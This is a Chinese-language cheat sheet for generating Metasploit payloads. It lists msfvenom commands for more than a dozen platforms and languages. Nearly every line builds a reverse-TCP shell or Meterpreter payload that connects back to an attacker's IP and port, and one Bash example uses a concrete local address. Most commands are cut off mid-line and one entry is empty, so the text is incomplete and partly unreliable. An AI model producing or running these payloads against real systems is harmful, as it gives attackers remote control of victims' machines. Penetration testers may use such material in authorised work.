使用MSF生成各种Payload
Windows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= |
Linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻 |
MAC OS:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP |
Android:
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻 |
PowerShell:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST= |
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT= |
ASP.net:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= |
JSP:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻 |
War:
|
Node.js:
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o |
Python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 - |
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o |
Ruby:
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o |
Lua:
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o |
Windows ShellCode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= |
linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻 |
mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP |
Bash shellcode:
[root@localhost ~]# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.30 LPORT=8888 > -f raw > payload.sh |
Python shellcode
msf5 > use exploit/multi/script/web_delivery |